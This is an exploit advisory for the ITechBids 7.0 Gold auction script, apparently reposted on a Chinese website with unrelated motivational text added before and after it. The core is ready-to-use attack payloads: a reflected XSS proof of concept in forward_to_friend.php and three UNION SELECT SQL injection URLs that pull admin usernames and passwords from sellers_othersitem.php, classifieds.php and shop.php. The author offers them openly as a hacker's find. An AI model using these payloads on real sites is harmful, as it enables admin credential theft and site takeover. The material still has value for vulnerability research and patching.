ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

人生百相,世态万千,当从容应对,淡泊处之,不畏浮云蔽眼,不被微利惑心,不为陷阱锁步,不使闲情损志。有些人,笑一笑,就陌生了,那些刻意的亲近,终究遁于无形;有些事,摆一摆,就过去了,当下的困苦挫败,可能是?高的阶梯。行至水穷路自横,坐看云起天亦高,凭的就是眼界与心胸。
######## ## ## ###### ######## ## ## ######## ######## ####### ########
## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## #### ## ## ## ## #### ## ## ## ## ## ##
###### ## ## ## ## ######## ## ######## ## ####### ## ##
## ## #### ## ## ## ## ## ## ## ## ##
## ## ### ## ## ## ## ## ## ## ## ## ## ##
######## ## ## ###### ## ## ## ## ## ####### ########

################################ !R4Q!4N H4CK3R ###################################

ITechBids 7.0 Gold Multiple Remote Vulnerabilities

Website : http://www.itechscripts.com

Founded By : Encrypt3d.M!nd

NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.


# 1- Cross-site scripting (XSS):

Affected File : forward_to_friend.php

PoC :

/forward_to_friend.php?productid=<script>alert(666);</script>


# 2-Remote Sql Injection(s) :

Affected File(s) :

sellers_othersitem.php
classifieds.php
shop.php

Note:There is Other Files Affected But I Couldn't Exploit Them :(

PoC:

/sellers_othersitem.php?seller_id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

/classifieds.php?productid=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

/shop.php?id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin


# Greetz:

MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,
KoRn The Dog,Mini-Spider,All My Friends


The EnD :D

本文ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities 到此结束。不曾扬帆,何以至远方。小编再次感谢大家对我们的支持!

标签: